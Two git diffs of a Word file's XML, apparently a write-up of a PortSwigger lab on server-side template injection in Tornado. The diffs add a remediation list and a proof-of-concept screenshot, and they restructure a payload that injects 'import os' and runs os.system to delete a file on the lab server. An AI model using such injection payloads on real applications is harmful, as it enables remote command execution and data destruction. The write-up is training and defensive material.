--- a/PortSwigger Labs/Advanced Topics/Server Side Template Injection/Lab 2 - Basic server-side template injection (code context).docx
+++ b/PortSwigger Labs/Advanced Topics/Server Side Template Injection/Lab 2 - Basic server-side template injection (code context).docx
@@ -458,7 +458,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>user.name}}{{7*7}}</w:t>
+        <w:t>user.name</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>}}{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>{7*7}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -480,7 +498,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>user.name}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')</w:t>
+        <w:t>user.name</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>}}{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -515,6 +551,249 @@
           <w:szCs w:val="40"/>
         </w:rPr>
         <w:t>REMEDIATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Avoid User-Controlled Templates:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Refrain from allowing user input to dictate or influence templates in any capacity. When users can control templates or parts thereof, the application becomes susceptible to server-side template injection attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Safe API Methods:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Opt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for methods or functions that are explicitly designed for constructing templates securely. For instance, in Tornado, avoid features or methods that allow for execution of arbitrary Python code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Sanitize and Validate Input:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Prior to processing, always sanitize and validate user inputs. Confirm that the information passed to templates meets the expected criteria in terms of type and format. Inputs with unexpected characters or those that seem harmful should be outrightly rejected.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Disable Unnecessary Template Features:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If certain features in the template engine are not necessary, disable them. By turning off certain features in Tornado, you can reduce the exploitable surface area.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Use Least Privilege Principle:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> It's important to run the application with the least privileges necessary. This minimizes potential damage if an attacker does execute arbitrary commands.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Input Escaping:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> It's pivotal to escape user input to ensure it’s recognized as data and isn’t executed as code, especially in scenarios where user input is added to templates.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Web Application Firewalls (WAFs):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Using a WAF can help identify and block suspicious requests. Contemporary WAFs are designed to detect and halt many attempts at template injection.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -530,6 +809,95 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="00F01CE0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="753AAB26"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CF17964"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0D9ED8E4"/>
@@ -618,7 +986,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4DF44F23"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4948A2BA"/>
@@ -708,10 +1076,13 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1785732818">
-    <w:abstractNumId w:val="0"/>
+    <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="250045273">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1786345094">
+    <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
 </file>

--- a/PortSwigger Labs/Advanced Topics/Server Side Template Injection/Lab 2 - Basic server-side template injection (code context).docx
+++ b/PortSwigger Labs/Advanced Topics/Server Side Template Injection/Lab 2 - Basic server-side template injection (code context).docx
@@ -521,6 +521,114 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>PROOF OF CONCEPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="323F958E" wp14:editId="4C5927AD">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>419100</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="4900295"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="420705819" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="420705819" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="4900295"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -606,7 +714,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Safe API Methods:</w:t>
       </w:r>
       <w:r>
@@ -689,6 +796,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Disable Unnecessary Template Features:</w:t>
       </w:r>
       <w:r>
